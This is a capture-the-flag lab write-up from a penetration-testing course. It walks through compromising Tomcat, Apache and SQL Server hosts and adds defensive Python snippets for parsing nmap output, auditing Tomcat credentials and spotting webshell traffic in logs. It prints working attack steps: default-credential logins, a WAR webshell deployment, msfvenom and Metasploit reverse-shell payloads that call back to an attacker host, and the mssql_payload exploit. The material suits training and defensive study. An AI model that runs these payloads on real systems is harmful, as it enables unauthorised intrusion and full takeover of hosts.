Here we go.
First CTF from eLearnSecurity's PTS course.
Black-box scenario.
[Apache Tomcat, SQL Server]
Connected to internal network via eth0.
Task: find flags on all hosts connected to network.
⇒ Tools used: Nmap, Dirb, Netcat & Metasploit (MSFvenom, MSFpayload & Listener for reverse TCP shell)
Stage I - Information Gathering:
was omitted since we're inside the network, so no OSINT or public-site search would be relevant here. If anything, subdomain enumeration with sublist3r / amass would have made sense though. Next time.
Stage II - Footprinting and Scanning:
Mapping the network with Nmap.
root@0xBlackhat:~ # nmap -sn 172.16.64.0/24 -oN discovery.nmap
-oN writes nmap's normal output format to a file; redirecting with > discovery.nmap would do as well, but with -oN we still see the output on the screen. Alternatively fping works, but it won't show anything on screen:
fping -a -g 172.16.64.0/24 2>/dev/null > test.nmap
root@0xBlackhat:~# cat discovery.nmap | grep for | grep -v "\.10$" | cut -d " " -f 5 > ipscan.txt
Filters the discovered addresses, drops our own IP (the pattern is anchored with $ so that hosts like .100 or .101 are not excluded as well) and writes the rest to a file. ipscan.txt is then fed to nmap for a full TCP scan:
root@0xBlackhat:~# nmap -sV -n -v -Pn -p- -T4 -iL ipscan.txt -A --open
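As an added example (not part of the original writeup), here is a small Python parser for the -oN discovery output that does the same job as the grep/cut pipeline but matches the excluded address exactly, so .100, .101 or .199 are never dropped together with .10; the sample scan text is constructed.

```python
import re

# Constructed sample of `nmap -sn 172.16.64.0/24 -oN discovery.nmap` output (not the writeup's real scan).
SAMPLE_DISCOVERY = """\
# Nmap 7.91 scan initiated Thu Feb 11 01:10:00 2021 as: nmap -sn 172.16.64.0/24 -oN discovery.nmap
Nmap scan report for 172.16.64.10
Host is up (0.00012s latency).
Nmap scan report for 172.16.64.100
Host is up (0.061s latency).
Nmap scan report for win10 (172.16.64.199)
Host is up (0.067s latency).
# Nmap done at Thu Feb 11 01:10:05 2021 -- 256 IP addresses (3 hosts up) scanned in 4.91 seconds
"""

# "Nmap scan report for 1.2.3.4" (with -n) or "Nmap scan report for name (1.2.3.4)" (with DNS).
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<host>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$"
)

def live_hosts(text, exclude=()):
    """Return IPs that nmap reported as up, skipping exact matches in `exclude`.
    Unlike grep -v "\\.10", excluding 172.16.64.10 keeps .100, .101 and .199."""
    hosts, pending = [], None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            pending = m.group("ip")      # remember the address until its status line shows up
            continue
        if pending and line.startswith("Host is up"):
            if pending not in set(exclude):
                hosts.append(pending)
            pending = None
    return hosts

if __name__ == "__main__":
    for ip in live_hosts(SAMPLE_DISCOVERY, exclude={"172.16.64.10"}):
        print(ip)                        # one address per line, ready for nmap -iL
```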
[...snip...]
Nmap scan report for 172.16.64.199
Host is up (0.067s latency).
Not shown: 65433 closed ports, 90 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after: 2051-02-08T22:15:06
| MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49943/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-02-08T22:15:06
| Not valid after: 2051-02-08T22:15:06
| MD5: a5b8 5acf 2158 5e33 43c5 3f2e 341e e5fa
|_SHA-1: 8425 8f9f 8d8a 0677 1de5 d232 658e 695e d3d9 7307
|_ssl-date: 2021-02-11T01:13:44+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 172.16.64.199:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:87:d9:d5 (VMware)
| Names:
| WIN10<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WIN10<20> Flags: <unique><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-11T01:13:38
|_ start_date: 2021-02-08T22:14:56
Victim 1: Apache Tomcat
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
59919/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's identify and exploit any Tomcat misconfigurations we can find.

If you go to the default directory /manager/html for the admin panel, use the default credentials. Someone posted the list on GitHub: https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown You can use a bash loop to base64-encode the user:password pairs like this:
$ for cred in $(cat /home/user/directory/sub_directory/tomcat_userpass.txt); do echo -n $cred | base64; done
which generates a list of base64-encoded user:password pairs.
You can then go ahead and use it with Burp Suite's Intruder (payload type Sniper). Remember to uncheck the URL-encode box.
Somehow Metasploit's brute-forcing with wordlists doesn't work, even if you slow it down. Not a big deal; you can just try your luck manually, which actually worked instantly for me using tomcat:s3cret. If I remember correctly, their 403 page even suggests that combination lol
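Added example, not from the original post: the same kind of default list is useful from the defender's side, to audit a Tomcat host's tomcat-users.xml for default or username-equals-password accounts that hold a manager role (the sample file and the credential pairs are constructed from well-known Tomcat defaults).

```python
import xml.etree.ElementTree as ET

# Well-known Tomcat default pairs of the kind found in the linked list; constructed subset.
DEFAULT_CREDS = {
    ("admin", "password"), ("admin", "admin"), ("admin", "tomcat"),
    ("manager", "manager"), ("role1", "role1"), ("role1", "tomcat"),
    ("root", "root"), ("root", "toor"), ("tomcat", "tomcat"),
    ("tomcat", "s3cret"), ("tomcat", "password"), ("tomcat", "admin"),
}
# Roles that grant access to /manager or /host-manager, and therefore to WAR deployment.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                 "admin-gui", "admin-script"}

# Constructed tomcat-users.xml (Tomcat 8 layout), not the CTF host's file.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xk9!v2Lq#m" roles="manager-script"/>
  <user username="bob" password="bob" roles="tomcat"/>
</tomcat-users>
"""

def audit_tomcat_users(xml_text):
    """Return (username, finding, manager roles held) for weak accounts.
    Only cleartext password attributes can be compared; entries hashed by a
    CredentialHandler never match and are not flagged here."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":   # tolerate namespaced and plain layouts
            continue
        name, pw = elem.get("username", ""), elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if (name, pw) in DEFAULT_CREDS:
            findings.append((name, "default credentials", sorted(roles & MANAGER_ROLES)))
        elif pw == name:
            findings.append((name, "password equals username", sorted(roles & MANAGER_ROLES)))
    return findings

if __name__ == "__main__":
    for name, finding, roles in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{name}: {finding}; manager roles: {roles or 'none'}")
```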
Ok, so now you have user access to the server. Good enough to upload and deploy files. Tomcat is a Java application server and works with WAR files. Fortunately, someone uploaded a WAR webshell to GitHub. Using our tomcat:s3cret user we go ahead and deploy the webshell manually. https://github.com/BustedSec/webshell/blob/master/webshell.war

Now clicking /webshell should be enough to direct us to the webshell. In case it doesn't work straight away, append '/index.jsp' to the URL as follows:
http://172.16.64.101:8080/webshell/index.jsp?cmd=whoami

Great, now we have a user and a shell. Let's obtain a reverse shell and work towards root with Metasploit payloads; the reverse TCP shell will help us bypass the firewall. Meterpreter WAR payloads don't work for some reason, so create a Metasploit listener as follows:
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_tcp
set lhost 172.16.64.10
set lport 59919
run
Port 59919 is already open on the victim, which is why we listen on it: a connection back to a different port would make the firewall fire up alarms.
Generate the executable with MSFvenom as follows:
root@0xBlackhat:~ # msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=172.16.64.10 lport=59919 -f elf -o meter
Now let's rename the file to meter.war, making it a fake WAR file; this doesn't change our malicious binary, but it allows us to upload it to the victim machine:
root@0xBlackhat:~ # mv meter meter.war
Let's now deploy this file as we previously did with the webshell on the /manager/html page. Deployment won't work, but it's still a valid executable and it's on the server now, which is all we want.
We move meter.war through the webshell as follows:
root@0xBlackhat:~ # mv /var/lib/tomcat8/webapps/meter.war /tmp/meter
root@0xBlackhat:~ # ls /tmp/meter
root@0xBlackhat:~ # chmod +x /tmp/meter
And we run as follows:
root@0xBlackhat:~ # /tmp/meter
And voilà, a new Meterpreter session opens up in our terminal. getuid shows we're in. Now it's about browsing the directories, which you can and should enumerate. I didn't, however, and I also don't remember where exactly the flag was; I think somewhere in the /home/user/admin directory or similar.
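Added example, not part of the writeup: the manager upload and the cmd= webshell calls above leave a distinctive trail in Tomcat's access log, and this Python snippet flags both patterns over constructed log lines (the common log format, the user names and the parameter names are assumptions).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Tomcat access-log lines (common log format), not taken from the CTF host.
SAMPLE_ACCESS_LOG = """\
172.16.64.10 - - [11/Feb/2021:01:18:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
172.16.64.10 - tomcat [11/Feb/2021:01:18:09 +0000] "GET /manager/html HTTP/1.1" 200 11945
172.16.64.10 - tomcat [11/Feb/2021:01:19:41 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 12106
172.16.64.10 - - [11/Feb/2021:01:20:05 +0000] "GET /webshell/index.jsp?cmd=whoami HTTP/1.1" 200 312
172.16.64.10 - tomcat [11/Feb/2021:01:25:13 +0000] "PUT /manager/text/deploy?path=/meter HTTP/1.1" 200 88
172.16.64.55 - - [11/Feb/2021:01:26:00 +0000] "GET /index.html HTTP/1.1" 200 10918
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_PARAMS = {"cmd", "command", "exec"}   # assumed names used by simple JSP webshells

def suspicious_requests(log_text):
    """Return (ip, user, finding, path) for successful manager deployments and
    for JSP pages called with a command-style query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if (url.path.startswith("/manager/") and m["method"] in ("POST", "PUT")
                and m["status"] == "200"):
            hits.append((m["ip"], m["user"], "manager deploy", url.path))
        elif url.path.endswith(".jsp") and SHELL_PARAMS & set(parse_qs(url.query)):
            hits.append((m["ip"], m["user"], "command parameter on JSP", url.path))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print(hit)
```

A successful manager deployment followed by a brand-new context answering cmd= requests from the same source is a strong indicator that the manager credentials are being misused.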
Victim 2
Webserver:
port 80/tcp open, Apache httpd 2.4.18 (Ubuntu)
So let's enumerate directories with dirb and see what we find.
root@0xBlackhat:~ # dirb http://172.16.64.140
using wordlist /usr/share/dirb/wordlists/common.txt
After a while http://172.16.64.140/project/ shows up; let's try admin:admin. Default credentials again, and we're in. Now let's run dirb with credentials this time to get a scan with access rights.
root@0xBlackhat:~ # dirb http://172.16.64.140/project -u admin:admin
This will eventually give us a couple more directories to browse and inspect.
One of those contains the credentials to access the SQL Server in the network.
It's also the flag we needed to find.
Victim 3
The SQL Server. Since we already have the credentials, it's not too much of a drama.
We can use Metasploit for this, loading the mssql_login module:
use auxiliary/scanner/mssql/mssql_login
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true
run
Metasploit's mssql_enum module helps us automate reconnaissance:
use auxiliary/admin/mssql/mssql_enum
set password fooadmin
set username fooadmin
set rport 1433
set rhosts 172.16.64.199
run
This is the part that takes some time, going through the displayed results. We get a lot of information about the database.
We see, e.g., that the account is indeed a system account, so we can use it to compromise the server with the mssql_payload module:
use exploit/windows/mssql/mssql_payload
set password fooadmin
set username fooadmin
set srvport 53
set rhosts 172.16.64.199
set payload windows/x64/meterpreter_reverse_tcp
set lhost 172.16.64.13
set lport 443
run
This uploads the payload, and a Meterpreter session opens in the terminal.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Let's spawn a shell and look for the flag:
meterpreter > shell
C:\> cd c:\Users
C:\Users> dir
And that's it. In one of those folders is the last flag.